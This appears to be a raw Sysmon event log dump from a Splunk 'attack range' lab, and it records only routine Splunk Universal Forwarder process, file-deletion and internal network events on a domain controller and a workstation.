154100x8000000000000000285322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.480{C8EA50B7-0E9B-6216-AF04-000000003802}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:20.609{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1A11F68E8766D2C6AB6CF6359BB4FD8,SHA256=F3F55BF2C190D65AB2F0093E47535DC04AB9A310DB371CB377095AAA75F9AF49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.697{C8EA50B7-0E9C-6216-B104-000000003802}58925764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E9C-6216-B104-000000003802}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0E9C-6216-B104-000000003802}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.510{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E9C-6216-B104-000000003802}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.511{C8EA50B7-0E9C-6216-B104-000000003802}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7588BE195CE7B3671406529DB182C86F,SHA256=7A8404BB6355D1BA23F2D4357E773DF40260C22A627DFAC38A4A4303A8374BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CEB2E8EBC628D1D788A87949EA5FDAA,SHA256=2D013584B6FD842CC7474F81EEE3DBA2149DCF06C53738C69A1AD3DCB2823DA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:20.260{C8EA50B7-0E9B-6216-B004-000000003802}40045416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E9B-6216-B004-000000003802}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:21.812{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F06050E031E354CA4E3906B8E533CBBC,SHA256=66D6F21A6FB6060450326C3BCD184540D26FF47DED80CE3EC43717D88C5AA93B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.557{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7588BE195CE7B3671406529DB182C86F,SHA256=7A8404BB6355D1BA23F2D4357E773DF40260C22A627DFAC38A4A4303A8374BF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E9D-6216-B204-000000003802}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0E9D-6216-B204-000000003802}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.135{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E9D-6216-B204-000000003802}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.137{C8EA50B7-0E9D-6216-B204-000000003802}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.010{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434C64A393EC2AA60BD9B6573462F2FE,SHA256=743B3C35A546A57C3DDCFAA0C839B456CFF27A75F1CEEF2B5D64678505188DB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:22.812{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E73EF3FE6399CC78D236A817BD9B2EF,SHA256=B9AAAB92CC0A071CB6100A55192DC391DC90C3B8CFD05B386C43E92CC6A276E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:22.026{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4F4AD3BACC230363E88B3B8980545B0,SHA256=DA0AC685ABB20F6D9CCE2AE7B7BFCFAB95670F04AA50E9C6128DC29DB44246D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:23.828{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879FCDF6C7885824AB1E7BEBAF5360A5,SHA256=77C4A4EC956F8439E54BCD546296E7C41552C68F205290DFD432DE28073AA733,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:21.580{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53248-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:23.072{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE0A3F89C2EA67AC9AC5550A38A9FA8A,SHA256=74697EDC3B5045F9F4FF82D8A254317ED4FDCF5E4D20C049B5B0A59C14FBB03F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:24.828{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B1AF0BAB71BE03CB51E306852BDC7DE,SHA256=06772F76E3CFBEF4FE9CE5C187C1EDA684356996084CEEB19F32AE92B4BCA2AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:24.088{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0A6CC57B17048E184591D2EE66A8F0,SHA256=671C41EF4D7C2E37C9BD559CEB8DB48BC183759D3442D8D5AFC4E7738F844DA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:21.673{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51193-false10.0.1.12-8000- 23542300x8000000000000000214487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:25.843{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2248F897638D67683D9F561BDF457DA5,SHA256=B9FB9BFDF6DBC56BF70D02409F2B3906F6C6944AC87DE3693D5BD49BF82AFCF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:25.104{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 